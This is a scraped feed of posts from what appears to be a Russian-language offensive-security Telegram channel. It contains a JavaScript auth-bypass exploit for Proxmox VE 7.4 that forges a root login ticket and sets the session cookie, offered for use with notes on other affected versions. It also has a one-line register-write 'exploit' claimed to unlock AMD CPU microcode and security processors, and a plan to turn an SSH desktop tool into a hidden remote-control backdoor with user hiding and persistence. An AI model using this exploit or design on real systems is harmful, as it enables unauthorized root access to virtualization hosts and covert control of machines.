This media is not supported in your browser
VIEW IN TELEGRAM
skitter-creek-bath-salts
*
exploit: “xor dword [0xf80c2094], 1<<22”
Unlocks CPU microcode, the platform security processor, system management mode, and every internal processor register, all at once, on 100 million AMD CPUs. As far as I can tell can’t be fixed.
get
*
exploit: “xor dword [0xf80c2094], 1<<22”
Unlocks CPU microcode, the platform security processor, system management mode, and every internal processor register, all at once, on 100 million AMD CPUs. As far as I can tell can’t be fixed.
get
👍15🔥3😱1
Забавнейшая штука ! SSHDESK
пиксели и input идут внутри SSH PTY
Я так подумал, концептуально его можно превратить в
screen capture
mouse injection
keyboard injection
remote GUI
encrypted transport
управляющий канал !!!
*** осталось сдлеать отдельный desktop в параллель (desk 0 to desk X), user hide, ну и какую никакую persistence модель бы воткнуть
god bless SSH
пиксели и input идут внутри SSH PTY
Я так подумал, концептуально его можно превратить в
HVNC под *nix, большая часть архитектуры то готова: screen capture
mouse injection
keyboard injection
remote GUI
encrypted transport
управляющий канал !!!
*** осталось сдлеать отдельный desktop в параллель (desk 0 to desk X), user hide, ну и какую никакую persistence модель бы воткнуть
god bless SSH
👍16🔥13😱2
25 august 1991
Некий фин, зарелизил core
О чем не постеснялся заявить через Usenet в группу
а дальше фина понесло, да и остальных зацепило.
С праздником !
#linux35 #50letVLKSM
Некий фин, зарелизил core
О чем не постеснялся заявить через Usenet в группу
comp.os.minix а дальше фина понесло, да и остальных зацепило.
С праздником !
#linux35 #50letVLKSM
👍35🔥16😱4
Proxmox VE
*
PVE 7.4 auth-bypass exploit
*
PVE 7.4 auth-bypass exploit
// PVE 7.4 auth-bypass @NebuSec 2026
// First, make sure to try logging in as root with this exact password: root@pam
(async () => {
const form = new URLSearchParams({
username: "root@pam",
password: "root@pam",
"tfa-challenge": "NEBUSEC-CHALLENGE",
});
const loginResponse = await fetch("/api2/json/access/ticket", {
method: "POST",
credentials: "omit",
headers: { "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8" },
body: form,
});
const loginBody = await loginResponse.json();
document.cookie = `PVEAuthCookie=${loginBody?.data?.ticket}; Path=/; Secure; SameSite=Strict`;
location.reload()
})();
😱19👍18🔥7
Proxy Bar
Proxmox VE * PVE 7.4 auth-bypass exploit // PVE 7.4 auth-bypass @NebuSec 2026 // First, make sure to try logging in as root with this exact password: root@pam (async () => { const form = new URLSearchParams({ username: "root@pam", password:…
This media is not supported in your browser
VIEW IN TELEGRAM
Подъехала инфа что в версии 8.0.3 / 8.2
8.4 и 9.2 пока (!) считаются безопасными
proxmox тоже есть bypass8.4 и 9.2 пока (!) считаются безопасными
👍21🔥11😱4